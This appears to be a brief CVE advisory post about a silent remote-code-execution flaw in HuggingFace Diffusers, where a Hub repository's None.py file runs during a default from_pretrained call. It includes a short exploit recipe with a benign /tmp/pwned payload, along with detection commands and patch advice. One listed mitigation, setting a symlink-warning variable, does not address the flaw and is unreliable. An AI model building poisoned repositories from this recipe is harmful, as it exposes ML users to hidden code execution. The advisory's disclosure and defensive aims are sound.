Listen to this Post
How the mentioned CVE works (technical details):
The vulnerability resides in `DiffusionPipeline.from_pretrained` when no `custom_pipeline` argument is supplied. Internally, `_resolve_custom_pipeline_and_cls` receives `custom_pipeline=None` and formats it as `f”{None}.py”` → "None.py". If a malicious HuggingFace Hub repository contains a file named None.py, the function treats it as a custom pipeline file. The security check for `trust_remote_code` occurs only in DiffusionPipeline.download(), which evaluates `custom_pipeline is None` as `False` and skips the validation. Later, during the second `_get_pipeline_class` call, `None.py` is loaded and executed without any warning. The attacker can embed arbitrary Python code in None.py, shadowing a legitimate pipeline class (e.g., FluxPipeline) to avoid breaking functionality. The malicious repo’s `model_index.json` can declare "_class_name": "FluxPipeline", making the payload invisible. If the model is not cached, `None.py` is automatically added to `allow_patterns` and downloaded. The victim only needs to run `DiffusionPipeline.from_pretrained(‘attacker/repo’)` – no `custom_pipeline` or `trust_remote_code` flags – and the RCE triggers silently, returning a fully functional pipeline.
dailycve form:
Platform: HuggingFace Diffusers
Version: <0.38.0
Vulnerability: Silent RCE
Severity: Critical
date: 2024-07-22
Prediction: Patch already out
What Undercode Say:
Analytics – bash commands to verify and monitor:
Check installed diffusers version pip show diffusers | grep Version Find all .py files in cached HuggingFace snapshots (potential None.py) find ~/.cache/huggingface/hub -name "None.py" -type f Audit custom pipeline usage in Python scripts grep -r "from_pretrained" --include=".py" | grep -v "trust_remote_code=True" Monitor file creation from malicious payload (example /tmp/pwned) auditctl -w /tmp/pwned -p wa -k diffusers_rce
How Exploit:
Attacker creates a Hub repo with:
– `None.py` containing a class inheriting `DiffusionPipeline` plus malicious code (e.g., write to /tmp/pwned).
– `model_index.json` with `”_class_name”: “FluxPipeline”` (or any existing pipeline).
– Victim runs:
from diffusers import DiffusionPipeline
pipeline = DiffusionPipeline.from_pretrained("attacker/none-py-repo")
– Malicious code executes silently; pipeline loads normally.
Protection from this CVE:
Upgrade to `diffusers>=0.38.0`:
pip install --upgrade "diffusers>=0.38.0"
If upgrade impossible:
- Only load pipelines from trusted, audited sources.
- Never use `from_pretrained` on untrusted Hub repos.
- Manually inspect snapshots for unexpected `.py` files (especially
None.py). - Set environment variable `HF_HUB_DISABLE_SYMLINKS_WARNING=1` and review cached content.
Impact:
Full remote code execution (RCE) with no user interaction beyond loading a model. Attackers can steal credentials, modify files, install backdoors, or pivot into internal networks. The breach is silent – the pipeline appears functional, leaving no immediate crash or error logs. Affects all versions before 0.38.0, including automated pipelines in CI/CD, research notebooks, and production ML systems using HuggingFace diffusers.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
